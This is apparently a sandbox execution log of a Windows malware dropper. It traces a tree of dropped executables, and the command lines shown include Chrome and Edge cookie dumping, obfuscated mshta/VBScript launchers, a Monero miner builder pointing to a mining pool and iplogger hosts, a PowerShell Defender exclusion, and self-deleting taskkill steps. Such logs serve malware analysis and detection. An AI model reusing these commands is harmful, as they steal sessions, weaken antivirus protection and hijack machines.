C:\Users\Admin\Documents\nSQuLz6LMvwW604cz6Cc5udc.exe"C:\Users\Admin\Documents\nSQuLz6LMvwW604cz6Cc5udc.exe"2⤵PID:2384
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4324 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5248
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵PID:5376
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:484
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5044
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6132
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:2732
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5560
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
PID:4376
-
-
-
C:\Users\Admin\Documents\iKBIlyzjFEyxcJCFAThmZJNH.exe"C:\Users\Admin\Documents\iKBIlyzjFEyxcJCFAThmZJNH.exe"2⤵
- Executes dropped EXE
PID:196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 6603⤵
- Program crash
PID:5048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 6803⤵
- Program crash
PID:4240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 7003⤵
- Program crash
PID:4020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 7363⤵
- Program crash
PID:4032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 8963⤵
- Program crash
PID:5652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 10763⤵
- Program crash
PID:5948
-
-
-
C:\Users\Admin\Documents\vMrvfTC40fz0wJQSNnEb1vlj.exe"C:\Users\Admin\Documents\vMrvfTC40fz0wJQSNnEb1vlj.exe"2⤵
- Executes dropped EXE
PID:3908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 6843⤵
- Program crash
PID:2116
-
-
-
C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"2⤵
- Executes dropped EXE
PID:3944 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵PID:4512
-
-
-
C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"2⤵
- Executes dropped EXE
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\is-VDAP4.tmp\gEga2cgo4qNeMiHj3tT00poP.tmp"C:\Users\Admin\AppData\Local\Temp\is-VDAP4.tmp\gEga2cgo4qNeMiHj3tT00poP.tmp" /SL5="$F0080,138429,56832,C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\is-N3K80.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-N3K80.tmp\Setup.exe" /Verysilent4⤵PID:5572
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\is-T5SG6.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-T5SG6.tmp\Stats.tmp" /SL5="$10358,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent6⤵PID:5168
-
C:\Users\Admin\AppData\Local\Temp\is-AFLK3.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-AFLK3.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'7⤵PID:2132
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵PID:6024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 7566⤵
- Program crash
PID:6288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 8086⤵
- Program crash
PID:6640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 7886⤵
- Program crash
PID:6856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 8206⤵
- Program crash
PID:7164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 9526⤵
- Program crash
PID:6488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 9806⤵
- Program crash
PID:4648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 10566⤵
- Program crash
PID:6908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 13886⤵
- Program crash
PID:7388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 14246⤵
- Program crash
PID:8056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 13606⤵
- Program crash
PID:6536
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵PID:6120
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579441 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:7160
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:5200
-
C:\Users\Admin\AppData\Roaming\8650465.exe"C:\Users\Admin\AppData\Roaming\8650465.exe"6⤵PID:4580
-
-
C:\Users\Admin\AppData\Roaming\3607852.exe"C:\Users\Admin\AppData\Roaming\3607852.exe"6⤵PID:6140
-
-
C:\Users\Admin\AppData\Roaming\5335525.exe"C:\Users\Admin\AppData\Roaming\5335525.exe"6⤵PID:3356
-
-
C:\Users\Admin\AppData\Roaming\3747631.exe"C:\Users\Admin\AppData\Roaming\3747631.exe"6⤵PID:6164
-
-
C:\Users\Admin\AppData\Roaming\7036782.exe"C:\Users\Admin\AppData\Roaming\7036782.exe"6⤵PID:6216
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:636
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:4556
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵PID:3372
-
C:\Users\Admin\Documents\OSYFcbCgdceAZQixUtJi8Tlm.exe"C:\Users\Admin\Documents\OSYFcbCgdceAZQixUtJi8Tlm.exe"6⤵
- Executes dropped EXE
PID:3148
-
-
C:\Users\Admin\Documents\fdMMVWWsTDNalgwaGnZLK7Ep.exe"C:\Users\Admin\Documents\fdMMVWWsTDNalgwaGnZLK7Ep.exe"6⤵PID:7164
-
-
C:\Users\Admin\Documents\UECWDFGVuk4A1N6NeuAuhixD.exe"C:\Users\Admin\Documents\UECWDFGVuk4A1N6NeuAuhixD.exe"6⤵PID:6516
-
-
C:\Users\Admin\Documents\tnZuMTEtPT3d3bOPBp4eECsV.exe"C:\Users\Admin\Documents\tnZuMTEtPT3d3bOPBp4eECsV.exe"6⤵PID:6580
-
C:\Users\Admin\Documents\tnZuMTEtPT3d3bOPBp4eECsV.exe"C:\Users\Admin\Documents\tnZuMTEtPT3d3bOPBp4eECsV.exe"7⤵PID:5972
-
-
-
C:\Users\Admin\Documents\hscQ92qXUHX0yeu881dl5sK7.exe"C:\Users\Admin\Documents\hscQ92qXUHX0yeu881dl5sK7.exe"6⤵PID:5928
-
C:\Users\Admin\Documents\hscQ92qXUHX0yeu881dl5sK7.exe"C:\Users\Admin\Documents\hscQ92qXUHX0yeu881dl5sK7.exe"7⤵PID:5304
-
-
C:\Users\Admin\Documents\hscQ92qXUHX0yeu881dl5sK7.exe"C:\Users\Admin\Documents\hscQ92qXUHX0yeu881dl5sK7.exe"7⤵PID:3412
-
-
-
C:\Users\Admin\Documents\Qvvs8SNYSBQk3RtoHU77JrIV.exe"C:\Users\Admin\Documents\Qvvs8SNYSBQk3RtoHU77JrIV.exe"6⤵PID:2652
-
-
C:\Users\Admin\Documents\tN0Td6x05BkgXVGepwcgN9Vj.exe"C:\Users\Admin\Documents\tN0Td6x05BkgXVGepwcgN9Vj.exe"6⤵PID:6556
-
-
C:\Users\Admin\Documents\x1nWp8TWE_8nvlTOgOkWTF_8.exe"C:\Users\Admin\Documents\x1nWp8TWE_8nvlTOgOkWTF_8.exe"6⤵PID:6976
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\x1nWp8TWE_8nvlTOgOkWTF_8.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\x1nWp8TWE_8nvlTOgOkWTF_8.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )7⤵PID:7632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\x1nWp8TWE_8nvlTOgOkWTF_8.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\x1nWp8TWE_8nvlTOgOkWTF_8.exe") do taskkill -IM "%~nXW" -f8⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu99⤵PID:6208
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )10⤵PID:6452
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f11⤵PID:4288
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE10⤵PID:6052
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "x1nWp8TWE_8nvlTOgOkWTF_8.exe" -f9⤵
- Kills process with taskkill
PID:6892
-
-
-
-
-
C:\Users\Admin\Documents\9WhHMOGQVQdVVINHm6dti4px.exe"C:\Users\Admin\Documents\9WhHMOGQVQdVVINHm6dti4px.exe"6⤵PID:5932
-
-
C:\Users\Admin\Documents\zUSWCOcWdaK19CVjinH1UmJF.exe"C:\Users\Admin\Documents\zUSWCOcWdaK19CVjinH1UmJF.exe"6⤵PID:6264
-
-
C:\Users\Admin\Documents\Rax6jqJjqDH3soYKZD1qcqu1.exe"C:\Users\Admin\Documents\Rax6jqJjqDH3soYKZD1qcqu1.exe"6⤵PID:6844
-
C:\Users\Admin\Documents\Rax6jqJjqDH3soYKZD1qcqu1.exeC:\Users\Admin\Documents\Rax6jqJjqDH3soYKZD1qcqu1.exe7⤵PID:8140
-
-
-
C:\Users\Admin\Documents\uTNfDHYEP4mgSV_k7i8pFtL5.exe"C:\Users\Admin\Documents\uTNfDHYEP4mgSV_k7i8pFtL5.exe"6⤵PID:7192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7192 -s 6607⤵
- Program crash
PID:7364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7192 -s 6767⤵
- Program crash
PID:8116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7192 -s 6327⤵
- Program crash
PID:796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7192 -s 6607⤵
- Program crash
PID:7616
-
-
-
C:\Users\Admin\Documents\wRn_g_EYJP6pBfZIk30aROje.exe"C:\Users\Admin\Documents\wRn_g_EYJP6pBfZIk30aROje.exe"6⤵PID:7236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 2527⤵
- Program crash
PID:6172
-
-
-
C:\Users\Admin\Documents\ARw2I8sFeKHwMfaBxh8LMMzy.exe"C:\Users\Admin\Documents\ARw2I8sFeKHwMfaBxh8LMMzy.exe"6⤵PID:7276
-
C:\Users\Admin\AppData\Roaming\4114280.exe"C:\Users\Admin\AppData\Roaming\4114280.exe"7⤵PID:8068
-
-
C:\Users\Admin\AppData\Roaming\1218051.exe"C:\Users\Admin\AppData\Roaming\1218051.exe"7⤵PID:3620
-
-
C:\Users\Admin\AppData\Roaming\3198239.exe"C:\Users\Admin\AppData\Roaming\3198239.exe"7⤵PID:8076
-
-
C:\Users\Admin\AppData\Roaming\6906100.exe"C:\Users\Admin\AppData\Roaming\6906100.exe"7⤵PID:5428
-
-
-
C:\Users\Admin\Documents\tIaNqyAzcKkokbszP9dNl8rj.exe"C:\Users\Admin\Documents\tIaNqyAzcKkokbszP9dNl8rj.exe"6⤵PID:7320
-
-
C:\Users\Admin\Documents\5mGgFChVr9aDlRl_H1896qV9.exe"C:\Users\Admin\Documents\5mGgFChVr9aDlRl_H1896qV9.exe"6⤵PID:7396
-
-
C:\Users\Admin\Documents\OrUnDv8qSUzmbnmX7urMLEXe.exe"C:\Users\Admin\Documents\OrUnDv8qSUzmbnmX7urMLEXe.exe"6⤵PID:7484
-
-
C:\Users\Admin\Documents\hMQLEgaGbQG4nyovYIM6wHad.exe"C:\Users\Admin\Documents\hMQLEgaGbQG4nyovYIM6wHad.exe"6⤵PID:7548
-
-
C:\Users\Admin\Documents\Na3EPaxXJEwbPr3VURSDTyMz.exe"C:\Users\Admin\Documents\Na3EPaxXJEwbPr3VURSDTyMz.exe"6⤵PID:7520
-
C:\Users\Admin\Documents\Na3EPaxXJEwbPr3VURSDTyMz.exe"C:\Users\Admin\Documents\Na3EPaxXJEwbPr3VURSDTyMz.exe" -q7⤵PID:7916
-
-
-
C:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exe"C:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exe"6⤵PID:7372
-
C:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exeC:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exe7⤵PID:7096
-
-
C:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exeC:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exe7⤵PID:5832
-
-
C:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exeC:\Users\Admin\Documents\AqimP5TcIJBATtCB_skmDWBM.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2828
-
-
-
C:\Users\Admin\Documents\IRwO3emcPJz_FyVY0Yu1zHTB.exe"C:\Users\Admin\Documents\IRwO3emcPJz_FyVY0Yu1zHTB.exe"6⤵PID:7992
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "IRwO3emcPJz_FyVY0Yu1zHTB.exe" /f & erase "C:\Users\Admin\Documents\IRwO3emcPJz_FyVY0Yu1zHTB.exe" & exit7⤵PID:6784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "IRwO3emcPJz_FyVY0Yu1zHTB.exe" /f8⤵
- Kills process with taskkill
PID:5868
-
-
-
-
C:\Users\Admin\Documents\3TFwYkHCZ9n19816QaNMBYxa.exe"C:\Users\Admin\Documents\3TFwYkHCZ9n19816QaNMBYxa.exe"6⤵PID:8036
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\3TFWYK~1.DLL,s C:\Users\Admin\DOCUME~1\3TFWYK~1.EXE7⤵PID:9956
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\3TFWYK~1.DLL,VyYxTQ==8⤵PID:4208
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\3TFWYK~1.DLL9⤵PID:9876
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\3TFWYK~1.DLL,YARbcVhIUUQz9⤵PID:9308
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 3180410⤵PID:4344
-
C:\Windows\system32\ctfmon.exectfmon.exe11⤵PID:9332
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpEFA8.tmp.ps1"9⤵PID:192
-
-
-
-
-
C:\Users\Admin\Documents\mMNhTzS3njEPOIlAZGrzVudp.exe"C:\Users\Admin\Documents\mMNhTzS3njEPOIlAZGrzVudp.exe"6⤵PID:6356
-
-
C:\Users\Admin\Documents\vql_T7FPHTJ3nGc0lb81_oKe.exe"C:\Users\Admin\Documents\vql_T7FPHTJ3nGc0lb81_oKe.exe"6⤵PID:7156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "vql_T7FPHTJ3nGc0lb81_oKe.exe" /f & erase "C:\Users\Admin\Documents\vql_T7FPHTJ3nGc0lb81_oKe.exe" & exit7⤵PID:8876
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "vql_T7FPHTJ3nGc0lb81_oKe.exe" /f8⤵
- Kills process with taskkill
PID:9100
-
-
-
-
C:\Users\Admin\Documents\E9FLiVU3D6NShDWC1ZYB2wIh.exe"C:\Users\Admin\Documents\E9FLiVU3D6NShDWC1ZYB2wIh.exe"6⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\is-R642O.tmp\E9FLiVU3D6NShDWC1ZYB2wIh.tmp"C:\Users\Admin\AppData\Local\Temp\is-R642O.tmp\E9FLiVU3D6NShDWC1ZYB2wIh.tmp" /SL5="$20520,138429,56832,C:\Users\Admin\Documents\E9FLiVU3D6NShDWC1ZYB2wIh.exe"7⤵PID:7816
-
C:\Users\Admin\AppData\Local\Temp\is-VNI4S.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VNI4S.tmp\Setup.exe" /Verysilent8⤵PID:8600
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵PID:8776
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579441 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:4004
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵PID:3880
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵PID:1532
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵PID:6080
-
-
-
-
-
C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe"C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe"2⤵
- Executes dropped EXE
PID:3248
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe") do taskkill -IM "%~nXW" -f1⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu92⤵
- Executes dropped EXE
PID:4292 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵PID:4852
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f4⤵PID:4684
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE3⤵PID:2592
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "yuOMwcQFh1wquc52IaH03wkF.exe" -f2⤵
- Kills process with taskkill
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\is-MVIFC.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-MVIFC.tmp\MediaBurner2.tmp" /SL5="$30302,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"3⤵PID:5876
-
C:\Users\Admin\AppData\Local\Temp\is-LT1NK.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-LT1NK.tmp\ultradumnibour.exe" /S /UID=burnerch24⤵PID:6132
-
C:\Program Files\Windows Media Player\FKJRYDCIZL\ultramediaburner.exe"C:\Program Files\Windows Media Player\FKJRYDCIZL\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\is-662O5.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-662O5.tmp\ultramediaburner.tmp" /SL5="$203D0,281924,62464,C:\Program Files\Windows Media Player\FKJRYDCIZL\ultramediaburner.exe" /VERYSILENT6⤵PID:7948
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu7⤵PID:8112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\58-4acfa-89c-16a92-a501d31d9b3b3\Laekecevexu.exe"C:\Users\Admin\AppData\Local\Temp\58-4acfa-89c-16a92-a501d31d9b3b3\Laekecevexu.exe"5⤵PID:2152
-
-
